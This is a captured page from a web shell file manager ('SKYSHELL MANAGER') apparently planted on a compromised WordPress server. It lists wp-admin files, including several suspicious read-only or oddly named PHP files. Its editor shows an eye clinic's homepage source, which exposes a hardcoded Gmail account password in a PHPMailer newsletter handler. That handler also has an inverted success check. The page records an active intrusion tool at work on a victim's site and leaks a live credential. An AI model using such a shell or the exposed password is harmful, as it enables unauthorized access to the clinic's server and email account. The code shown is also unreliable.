📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Sun Visionpro</title> <link href="img/fav.png" rel="icon" type="image/png"> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> <!-- Favicon --> <link href="img/favicon.ico" rel="icon"> <!-- Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;500;600&family=Rubik:wght@500;600;700&display=swap" rel="stylesheet"> <!-- Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> <!-- Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <!-- Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> <!-- Template Stylesheet --> <link href="css/style.css" rel="stylesheet"> </head> <body> <!-- Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center"> <div class="spinner-border text-primary" role="status" style="width: 3rem; height: 3rem;"></div> </div> <!-- Spinner End --> <!-- Topbar Start --> <div class="container-fluid bg-dark px-0"> <div class="row g-0 d-none d-lg-flex"> <div class="col-lg-6 ps-5 text-start"> <div class="h-100 d-inline-flex align-items-center text-white"> <a class="btn btn-link text-light" href="appointment-request.php"><i class="fa fa-envelope" aria-hidden="true"></i> <span>Book Appointment</span></a> </div> </div> <div class="col-lg-6 text-end"> <div class="h-100 topbar-right d-inline-flex align-items-center text-white py-2 px-5"> <span class="fs-5 fw-bold me-2"><i class="fa fa-phone-alt me-2"></i>Call Us:</span> <span class="fs-5 fw-bold">(+1) 7068 918 892</span> </div> </div> </div> </div> <!-- Topbar End --> <!-- Navbar Start --> <nav class="navbar navbar-expand-lg bg-white navbar-light sticky-top py-0 pe-5"> <a href="index.php" class="navbar-brand ps-5 me-0"> <img class="img-fluid" src="img/logo.png" alt=""> </a> <button type="button" class="navbar-toggler me-0" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto p-4 p-lg-0"> <a href="index.php" class="nav-item nav-link active">Home</a> <a href="about.php" class="nav-item nav-link">About Us</a> <div class="nav-item dropdown"> <a href="service.php" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Our Services</a> <div class="dropdown-menu bg-light m-0"> <a href="cataracts.php" class="dropdown-item">Cataract Surgery</a> <a href="retina.php" class="dropdown-item">Retina</a> <a href="glaucoma.php" class="dropdown-item">Glaucoma Surgery</a> <a href="lasik.php" class="dropdown-item">LASIK</a> <a href="icl.php" class="dropdown-item">Implantable Collamer Lens (ICL)</a> <a href="dry-eye-syndrome.php" class="dropdown-item">Dry eyes</a> <a href="diabetic-retinopathy.php" class="dropdown-item">Diabetes Eye Care</a> <a href="cosmetic.php" class="dropdown-item">Cosmetics</a> <a href="eyelid-surgery.php" class="dropdown-item">Eyelid Surgery</a> <a href="routine-eye-exam.php" class="dropdown-item">Routine Eye Exams</a> <a href="optical-shop.php" class="dropdown-item">Optical Shop</a> </div> </div> <div class="nav-item dropdown"> <a href="service.php" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Eye Resources</a> <div class="dropdown-menu bg-light m-0"> <a class="dropdown-item" href="laser-cataract-surgery.php">Laser Cataract Surgery</a> <a class="dropdown-item" href="routine-eye-exam.php">Routine Eye Exam</a> <a class="dropdown-item" href="how-the-eye-works.php">How the Eye Works</a> <a class="dropdown-item" href="introduction-to-the-eye.php">Introduction to the Eye</a> <a class="dropdown-item" href="multifocal-intraocular-lens-implants">Multifocal Intraocular Lens Implants</a> </div> </div> <div class="nav-item dropdown"> <a href="service.php" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Lenses & Frames</a> <div class="dropdown-menu bg-light m-0"> <a class="dropdown-item" href="optical-shop.php">Visit our Optical</a> <a class="dropdown-item" href="blue-light-and-eye-health.php">Blue Light and Eye Health</a> <a class="dropdown-item" href="eyeglass-frame-materials.php">Eyeglass Frame Materials</a> <a class="dropdown-item" href="high-definition-lenses.php">High Definition Lenses</a> <a class="dropdown-item" href="no-glare-lenses.php">No Glare Lenses</a> <a class="dropdown-item" href="progressive-lenses.php">Progressive Lenses</a> <a class="dropdown-item" href="proper-lens-care-instructions.php">Proper Lens Care Instructions</a> <a class="dropdown-item" href="protective-eyewear.php">Protective Eyewear</a> <a class="dropdown-item" href="reduce-digital-eye-strain.php">Reduce Digital Eye Strain</a> <a class="dropdown-item" href="scratch-protection.php">Scratch Protection</a> <a class="dropdown-item" href="sunglasses.php">Sunglasses</a> <a class="dropdown-item" href="thinner-and-lighter-lenses.php">Thinner and Lighter Lenses</a> </div> </div> <a href="patient-center.php" class="nav-item nav-link">Patient Center</a> <a href="appointment-request.php" class="nav-item nav-link">Appointment</a> <a href="contact.php" class="nav-item nav-link">Contact</a> </div> <a href="subscribe.php" class="btn btn-primary px-3 d-none d-lg-block">Get A Quote</a> </div> </nav> <!-- Navbar End --> <!-- Carousel Start --> <div class="container-fluid px-0 mb-5"> <div id="header-carousel" class="carousel slide" data-bs-ride="carousel"> <div class="carousel-inner"> <div class="carousel-item active"> <img class="w-100" src="img/sl3.jpg" alt="Image"> <div class="carousel-caption"> <div class="container"> <div class="row justify-content-center"> <div class="col-lg-10 text-start"> <p class="fs-5 fw-medium text-primary text-uppercase animated slideInRight">Welcome To Sun Visionpro</p> <h1 class="display-1 text-white mb-5 animated slideInRight">Eye emergencies and foreign object removal</h1> <a href="" class="btn btn-primary py-3 px-5 animated slideInRight">Explore More</a> </div> </div> </div> </div> </div> <div class="carousel-item"> <img class="w-100" src="img/sl4.jpg" alt="Image"> <div class="carousel-caption"> <div class="container"> <div class="row justify-content-center"> <div class="col-lg-10 text-start"> <p class="fs-5 fw-medium text-primary text-uppercase animated slideInRight">12 Years of Working Experience</p> <h1 class="display-1 text-white mb-5 animated slideInRight">Low vision care and services for visually impaired</h1> <a href="" class="btn btn-primary py-3 px-5 animated slideInRight">Explore More</a> </div> </div> </div> </div> </div> </div> <button class="carousel-control-prev" type="button" data-bs-target="#header-carousel" data-bs-slide="prev"> <span class="carousel-control-prev-icon" aria-hidden="true"></span> <span class="visually-hidden">Previous</span> </button> <button class="carousel-control-next" type="button" data-bs-target="#header-carousel" data-bs-slide="next"> <span class="carousel-control-next-icon" aria-hidden="true"></span> <span class="visually-hidden">Next</span> </button> </div> </div> <!-- Carousel End --> <!-- About Start --> <div class="container-xxl py-5"> <div class="container"> <div class="row g-5"> <div class="col-lg-6"> <div class="row gx-3 h-100"> <div class="col-6 align-self-start wow fadeInUp" data-wow-delay="0.1s"> <img class="img-fluid" src="img/ab5.jpg"> </div> <div class="col-6 align-self-end wow fadeInDown" data-wow-delay="0.1s"> <img class="img-fluid" src="img/ab7.jpg"> </div> </div> </div> <div class="col-lg-6 wow fadeIn" data-wow-delay="0.5s"> <p class="fw-medium text-uppercase text-primary mb-2">About Us</p> <h1 class="display-5 mb-4">Welcome To Sun Visionpro</h1> <p class="ph">Welcome to Sun Visionpro, where we are dedicated to providing the highest quality eye care services and eyewear for your entire family. Our experienced team of Ophthalmologists and Optometrists take pride in offering personalized care to address all of your eye health needs. Our friendly and knowledgeable staff will take the time to answer all of your questions and ensure that you fully understand all of your options.</p> <p class="ph">If you are looking for convenient, high-quality eye care services and experienced professionals who truly care about your eye health, contact us today. We look forward to serving you and your family.</p> </div> </div> </div> </div> <!-- About End --> <!-- Facts Start --> <div class="container-fluid facts my-5 p-5"> <div class="row g-5"> <div class="col-md-6 col-xl-3 wow fadeIn" data-wow-delay="0.1s"> <div class="text-center border p-5"> <i class="fa fa-certificate fa-3x text-white mb-3"></i> <h1 class="display-2 text-primary mb-0" data-toggle="counter-up">12</h1> <span class="fs-5 fw-semi-bold text-white">Years Experience</span> </div> </div> <div class="col-md-6 col-xl-3 wow fadeIn" data-wow-delay="0.3s"> <div class="text-center border p-5"> <i class="fa fa-users-cog fa-3x text-white mb-3"></i> <h1 class="display-2 text-primary mb-0" data-toggle="counter-up">135</h1> <span class="fs-5 fw-semi-bold text-white">Team Members</span> </div> </div> <div class="col-md-6 col-xl-3 wow fadeIn" data-wow-delay="0.5s"> <div class="text-center border p-5"> <i class="fa fa-users fa-3x text-white mb-3"></i> <h1 class="display-2 text-primary mb-0" data-toggle="counter-up">957</h1> <span class="fs-5 fw-semi-bold text-white">Happy Clients</span> </div> </div> <div class="col-md-6 col-xl-3 wow fadeIn" data-wow-delay="0.7s"> <div class="text-center border p-5"> <i class="fa fa-check-double fa-3x text-white mb-3"></i> <h1 class="display-2 text-primary mb-0" data-toggle="counter-up">1839</h1> <span class="fs-5 fw-semi-bold text-white">Projects Done</span> </div> </div> </div> </div> <!-- Facts End --> <!-- Features Start --> <div class="container-xxl py-5"> <div class="container"> <div class="row g-5 align-items-center"> <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.1s"> <div class="position-relative me-lg-4"> <img class="img-fluid w-100" src="img/ab8.jpg" alt=""> </div> </div> <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.5s"> <p class="fw-medium text-uppercase text-primary mb-2">Why Choosing Us!</p> <h1 class="display-5 mb-4">Few Reasons Why People Choosing Us!</h1> <p class="ph">Whether you are a new or existing patient, our doctors and skilled opticians provide:</p> <div class="row gy-4"> <div class="col-12"> <div class="d-flex"> <div class="flex-shrink-0 btn-lg-square rounded-circle bg-primary"> <i class="fa fa-check text-white"></i> </div> <div class="ms-4"> <span>Comprehensive eye exams</span> </div> </div> </div> <div class="col-12"> <div class="d-flex"> <div class="flex-shrink-0 btn-lg-square rounded-circle bg-primary"> <i class="fa fa-check text-white"></i> </div> <div class="ms-4"> <span>Contact lens fittings and help picking eyeglass frames and features</span> </div> </div> </div> <div class="col-12"> <div class="d-flex"> <div class="flex-shrink-0 btn-lg-square rounded-circle bg-primary"> <i class="fa fa-check text-white"></i> </div> <div class="ms-4"> <span>Eye disease diagnosis and treatment including help for cataracts, glaucoma, and diabetic eye disease</span> </div> </div> </div> <div class="col-12"> <div class="d-flex"> <div class="flex-shrink-0 btn-lg-square rounded-circle bg-primary"> <i class="fa fa-check text-white"></i> </div> <div class="ms-4"> <span>Eye emergencies and foreign object removal</span> </div> </div> </div> <div class="col-12"> <div class="d-flex"> <div class="flex-shrink-0 btn-lg-square rounded-circle bg-primary"> <i class="fa fa-check text-white"></i> </div> <div class="ms-4"> <span>Low vision care and services for visually impaired</span> </div> </div> </div> </div> </div> </div> </div> </div> <!-- Features End --> <!-- Service Start --> <div class="container-xxl py-5"> <div class="container"> <div class="text-center mx-auto pb-4 wow fadeInUp" data-wow-delay="0.1s" style="max-width: 600px;"> <p class="fw-medium text-uppercase text-primary mb-2">Our Services</p> <h1 class="display-5 mb-4">We Provide Best Vision Care Services</h1> </div> <div class="row gy-5 gx-4"> <div class="col-md-6 col-lg-4 wow fadeInUp" data-wow-delay="0.1s"> <div class="service-item"> <img class="img-fluid" src="img/sr1.jpg" alt=""> <div class="service-img"> <img class="img-fluid" src="img/sr1.jpg" alt=""> </div> <div class="service-detail"> <div class="service-title"> <hr class="w-25"> <h3 class="mb-0">Diabetic Retinopathy</h3> <hr class="w-25"> </div> <div class="service-text"> <p class="text-white mb-0">Diabetic retinopathy is an ocular manifestation of diabetes, a systemic disease, which affects up to 80 percent of all patients who have had diabetes for 10 years or more. The longer a person has diabetes, the higher his or her chances are of developing diabetic retinopathy.</p> </div> </div> <a class="btn btn-light" href="diabetic-retinopathy.php">Read More</a> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInUp" data-wow-delay="0.3s"> <div class="service-item"> <img class="img-fluid" src="img/sr2.jpg" alt=""> <div class="service-img"> <img class="img-fluid" src="img/sr2.jpg" alt=""> </div> <div class="service-detail"> <div class="service-title"> <hr class="w-25"> <h3 class="mb-0">Routine Eye Exam</h3> <hr class="w-25"> </div> <div class="service-text"> <p class="text-white mb-0">A routine eye exam is a comprehensive examination of your eyes, which includes several tests to evaluate your vision and overall eye health. Your eye doctor will typically start with a review of your medical history and any medications you may be taking, followed by a series of tests to check your vision, eye movements, and eye pressure.</p> </div> </div> <a class="btn btn-light" href="routine-eye-exam.php">Read More</a> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInUp" data-wow-delay="0.5s"> <div class="service-item"> <img class="img-fluid" src="img/sr3.jpg" alt=""> <div class="service-img"> <img class="img-fluid" src="img/sr3.jpg" alt=""> </div> <div class="service-detail"> <div class="service-title"> <hr class="w-25"> <h3 class="mb-0">Refractive Surgery</h3> <hr class="w-25"> </div> <div class="service-text"> <p class="text-white mb-0">Our practice has been performing Refractive Surgery since 1999. Refractive Surgery is a surgical procedure performed to correct the refractive error (spectacle power) of eyes. They are usually done to get rid of, or reduce dependence on, glasses and contact lenses. There are several types of refractive surgery including LASIK, PRK and ICLs.</p> </div> </div> <a class="btn btn-light" href="refractive-surgery.php">Read More</a> </div> </div> </div> </div> </div> <!-- Service End --> <!-- Project Start --> <div class="container-fluid bg-dark pt-5 my-5 px-0"> <div class="text-center mx-auto mt-5 wow fadeIn" data-wow-delay="0.1s" style="max-width: 600px;"> <p class="fw-medium text-uppercase text-primary mb-2">Our Services</p> <h1 class="display-5 text-white mb-5">See What Services We are Providing</h1> </div> <div class="owl-carousel project-carousel wow fadeIn" data-wow-delay="0.1s"> <a class="project-item" href="cataracts.php"> <img class="img-fluid" src="img/sr4.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Cataract Surgery</h5> </div> </a> <a class="project-item" href="retina.php"> <img class="img-fluid" src="img/sr5.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Retina</h5> </div> </a> <a class="project-item" href="glaucoma.php"> <img class="img-fluid" src="img/sr6.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Glaucoma Surgery</h5> </div> </a> <a class="project-item" href="lasik.php"> <img class="img-fluid" src="img/sr7.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">LASIK</h5> </div> </a> <a class="project-item" href="icl.php"> <img class="img-fluid" src="img/sr8.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Implantable Collamer Lens (ICL)</h5> </div> </a> <a class="project-item" href="dry-eye-syndrome.php"> <img class="img-fluid" src="img/sr9.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Dry eyes</h5> </div> </a> <a class="project-item" href="diabetic-retinopathy.php"> <img class="img-fluid" src="img/sr10.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Diabetes Eye Care</h5> </div> </a> <a class="project-item" href="cosmetic.php"> <img class="img-fluid" src="img/sr11.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Cosmetics</h5> </div> </a> <a class="project-item" href="eyelid-surgery.php"> <img class="img-fluid" src="img/sr12.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Eyelid Surgery</h5> </div> </a> <a class="project-item" href="routine-eye-exam.php"> <img class="img-fluid" src="img/sr13.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Routine Eye Exams</h5> </div> </a> <a class="project-item" href="optical-shop.php"> <img class="img-fluid" src="img/sr14.jpg" alt=""> <div class="project-title"> <h5 class="text-primary mb-0">Optical Shop</h5> </div> </a> </div> </div> <!-- Project End --> <!-- Team Start --> <div class="container-xxl py-5"> <div class="container"> <div class="text-center mx-auto wow fadeInUp" data-wow-delay="0.1s" style="max-width: 600px;"> <p class="fw-medium text-uppercase text-primary mb-2">OUR DOCTOR TEAM</p> <h1 class="display-5 mb-5">Meet Our Award-Winning Healthcare Team!</h1> </div> <div class="row g-4"> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.1s"> <div class="team-item"> <img class="img-fluid" src="img/t1.jpg" alt=""> <div class="d-flex"> <div class="flex-shrink-0 btn-square bg-primary" style="width: 90px; height: 90px;"> <i class="fa fa-2x fa-share text-white"></i> </div> <div class="position-relative overflow-hidden bg-light d-flex flex-column justify-content-center w-100 ps-4" style="height: 90px;"> <h5>Daniel Robert, M.D.</h5> </div> </div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.3s"> <div class="team-item"> <img class="img-fluid" src="img/t3.jpg" alt=""> <div class="d-flex"> <div class="flex-shrink-0 btn-square bg-primary" style="width: 90px; height: 90px;"> <i class="fa fa-2x fa-share text-white"></i> </div> <div class="position-relative overflow-hidden bg-light d-flex flex-column justify-content-center w-100 ps-4" style="height: 90px;"> <h5>Isabella, M.D.</h5> </div> </div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.5s"> <div class="team-item"> <img class="img-fluid" src="img/t2.jpg" alt=""> <div class="d-flex"> <div class="flex-shrink-0 btn-square bg-primary" style="width: 90px; height: 90px;"> <i class="fa fa-2x fa-share text-white"></i> </div> <div class="position-relative overflow-hidden bg-light d-flex flex-column justify-content-center w-100 ps-4" style="height: 90px;"> <h5>William Joseph, O.D.</h5> </div> </div> </div> </div> </div> </div> </div> <!-- Team End --> <!-- Testimonial Start --> <div class="container-xxl py-5"> <div class="container"> <div class="text-center mx-auto wow fadeInUp" data-wow-delay="0.1s" style="max-width: 600px;"> <p class="fw-medium text-uppercase text-primary mb-2">Our Patients Say!</p> <h1 class="display-5 mb-5">What Our Patients Talking About Us?</h1> </div> <div class="owl-carousel testimonial-carousel wow fadeInUp" data-wow-delay="0.1s"> <div class="testimonial-item text-center"> <div class="testimonial-img position-relative"> <img class="img-fluid rounded-circle mx-auto mb-5" src="img/tm.jpg"> <div class="btn-square bg-primary rounded-circle"> <i class="fa fa-quote-left text-white"></i> </div> </div> <div class="testimonial-text text-center rounded p-4"> <p>My husband has vision in one eye. They took really good care of him. They were very careful with him. The doctor and his team handled him with great care. I will recommend them to everyone I know. I want to thank everyone for the great work. We are very grateful.</p> <h5 class="mb-1">Andrea Ledbetter</h5> </div> </div> <div class="testimonial-item text-center"> <div class="testimonial-img position-relative"> <img class="img-fluid rounded-circle mx-auto mb-5" src="img/tm.jpg"> <div class="btn-square bg-primary rounded-circle"> <i class="fa fa-quote-left text-white"></i> </div> </div> <div class="testimonial-text text-center rounded p-4"> <p>Staff was extremely friendly, which is very important to me. I was seen at my appointment time and during the process they seemed highly skilled along with doing a thorough inspection of my eyes. I will definitely be going back for my next appointment and would recommend everyone to come to experience the friendly and knowledgeable staff they have on board. Excellent job !!</p> <h5 class="mb-1">Jeanne Delaney</h5> </div> </div> <div class="testimonial-item text-center"> <div class="testimonial-img position-relative"> <img class="img-fluid rounded-circle mx-auto mb-5" src="img/tm.jpg"> <div class="btn-square bg-primary rounded-circle"> <i class="fa fa-quote-left text-white"></i> </div> </div> <div class="testimonial-text text-center rounded p-4"> <p>My experience with this office was fabulous. I called to schedule the appointment the receptionist was very nice and pleasant. All of the staff I encountered were nice and very eager to help. The exam with Dr. Nusz was quick and efficient. Loved the large selection of glasses to choose from!!</p> <h5 class="mb-1">Beverly Billings</h5> </div> </div> </div> </div> </div> <!-- Testimonial End --> <!-- Footer Start --> <div class="container-fluid bg-dark footer mt-5 py-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6" style="padding-right: 0;"> <h5 class="text-white mb-4">Our Office</h5> <p class="mb-2" style="font-size: 14px;line-height: 2;"><i class="fa fa-map-marker-alt me-3" style="color:#ffff"></i>390 Grady Ct, Suite 974<br> Henderson, NV 89014<br> United States.</p> <p class="mb-2" style="font-size: 14px;line-height: 2;"><i class="fa fa-phone-alt me-3" style="color:#ffff"></i>(+1) 7068 918 892</p> <p class="mb-2" style="font-size: 14px;line-height: 2;"><i class="fa fa-envelope me-3" style="color:#ffff"></i>blanche@sunvisionpro.com</p> <h5 class="text-white mb-4" style="padding-top: 30px;">Quick Link</h5> <a class="btn btn-link" href="privacy.php">Privacy</a> <a class="btn btn-link" href="terms.php">Terms & Conditions</a> <a class="btn btn-link" href="unsubscribe.php">Unsubscribe Our Newsletter</a> </div> <div class="col-lg-2 col-md-6" style="padding-left: 0;"> <h5 class="text-white mb-4">Eye Resources</h5> <a class="btn btn-link" href="laser-cataract-surgery.php">Laser Cataract Surgery</a> <a class="btn btn-link" href="routine-eye-exam.php">Routine Eye Exam</a> <a class="btn btn-link" href="how-the-eye-works.php">How the Eye Works</a> <a class="btn btn-link" href="introduction-to-the-eye.php">Introduction to the Eye</a> <a class="btn btn-link" href="multifocal-intraocular-lens-implants">Multifocal Intraocular Lens Implants</a> <h5 class="text-white mb-4" style="padding-top: 30px;">Contact Lenses</h5> <a class="btn btn-link" href="contactsthe-right-age-for-contacts.php">The Right Age for Contacts</a> <a class="btn btn-link" href="types-of-contact-lenses.php">Types of Contact Lenses</a> </div> <div class="col-lg-2 col-md-6" style="padding-right: 0;"> <h5 class="text-white mb-4">Lenses & Frames</h5> <a class="btn btn-link" href="optical-shop.php">Visit our Optical</a> <a class="btn btn-link" href="blue-light-and-eye-health.php">Blue Light and Eye Health</a> <a class="btn btn-link" href="eyeglass-frame-materials.php">Eyeglass Frame Materials</a> <a class="btn btn-link" href="high-definition-lenses.php">High Definition Lenses</a> <a class="btn btn-link" href="no-glare-lenses.php">No Glare Lenses</a> <a class="btn btn-link" href="progressive-lenses.php">Progressive Lenses</a> <a class="btn btn-link" href="proper-lens-care-instructions.php">Proper Lens Care Instructions</a> <a class="btn btn-link" href="protective-eyewear.php">Protective Eyewear</a> <a class="btn btn-link" href="reduce-digital-eye-strain.php">Reduce Digital Eye Strain</a> <a class="btn btn-link" href="scratch-protection.php">Scratch Protection</a> <a class="btn btn-link" href="sunglasses.php">Sunglasses</a> <a class="btn btn-link" href="thinner-and-lighter-lenses.php">Thinner and Lighter Lenses</a> </div> <div class="col-lg-2 col-md-6" style="padding-right: 0;"> <h5 class="text-white mb-4">Eye & Health Disease</h5> <a class="btn btn-link" href="blepharitis.php">Blepharitis</a> <a class="btn btn-link" href="cataracts.php">Cataracts</a> <a class="btn btn-link" href="conjunctivitis.php">Conjunctivitis</a> <a class="btn btn-link" href="diabetic-retinopathy.php">Diabetic Retinopathy</a> <a class="btn btn-link" href="dry-eye-syndrome.php">Dry Eye Syndrome</a> <a class="btn btn-link" href="eye-allergies.php">Eye Allergies</a> <a class="btn btn-link" href="glaucoma.php">Glaucoma</a> <a class="btn btn-link" href="macular-degeneration.php">Macular Degeneration</a> <a class="btn btn-link" href="retinal-tears-and-detachments.php">Retinal Tears and Detachments</a> </div> <div class="col-lg-3 col-md-6" style="padding-right: 0;"> <h5 class="text-white mb-4">Newsletter</h5> <p class="mb-2" style="font-size: 14px;line-height: 2;">Subscribe our newsletter to get latest news, eye care tips and health advice.</p> <div class="position-relative w-100"> <form method="post" action="index.php"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" name="email" type="text" placeholder="Your email"> <button type="submit" name="Submit" class="btn btn-primary py-2 position-absolute top-0 end-0 mt-2 me-2">SignUp</button> </form> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; //require_once __DIR__ . '/vendor/phpmailer/src/Exception.php'; require_once __DIR__ . '/vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/vendor/phpmailer/src/SMTP.php'; //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ $mail = new PHPMailer(true); // Server settings //$mail->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'blanche@sunvisionpro.com'; // YOUR gmail email $mail->Password = 'pccxdhjttybyhxje'; // YOUR gmail password // Sender and recipient settings $mail->setFrom('blanche@sunvisionpro.com', 'Sun Visionpro'); $mail->addAddress($email, $name, $message); $mail->addReplyTo('blanche@sunvisionpro.com', 'Sun Visionpro'); // to set the reply to // Setting the email content $mail->IsHTML(true); $mail->Subject = "Subscribe Replay"; $mail->Body = "<h3>Hi,</h3> <p>Thanks for subscribing to our newsletter.</p> <p>We are glad that you joined us...</p><br><br> <p>Regards,<br> <b>Sun Visionpro</b></p>"; //$mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Success! check sometimes later."; } else { echo "Your submission has been submitted successfully."; } $mail2 = new PHPMailer(true); // Server settings //$mail2->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail2->isSMTP(); $mail2->Host = 'smtp.gmail.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail2->Port = 587; $mail2->Username = 'blanche@sunvisionpro.com'; // YOUR gmail email $mail2->Password = 'pccxdhjttybyhxje'; // YOUR gmail password // Sender and recipient settings $mail2->setFrom('blanche@sunvisionpro.com', 'Sun Visionpro'); $mail2->addAddress('blanche@sunvisionpro.com', 'Sun Visionpro'); //$mail->addReplyTo('blanche@sunvisionpro.com', 'Sun Visionpro'); // to set the reply to // Setting the email content $mail2->IsHTML(true); $mail2->Subject = "Subscribe Details"; $mail2->Body = "<strong>Following user has been submitted subscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message : $message<br>"; //$mail->AltBody = "This is the plain text version of the email content"; $mail2->send(); } } ?> </div> </div> </div> </div> </div> <!-- Footer End --> <!-- Copyright Start --> <div class="container-fluid copyright bg-dark py-4"> <div class="container text-center"> <p class="mb-2" style="font-size: 12px;">Copyright © 2025 <a class="fw-semi-bold" href="index.php">Sun Visionpro</a>, All Right Reserved.</p> </div> </div> <!-- Copyright End --> <!-- Back to Top --> <a href="#" class="btn btn-lg btn-primary btn-lg-square rounded-circle back-to-top"><i class="bi bi-arrow-up"></i></a> <!-- JavaScript Libraries --> <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script> <script src="lib/wow/wow.min.js"></script> <script src="lib/easing/easing.min.js"></script> <script src="lib/waypoints/waypoints.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <!-- Template Javascript --> <script src="js/main.js"></script> </body> </html>
Save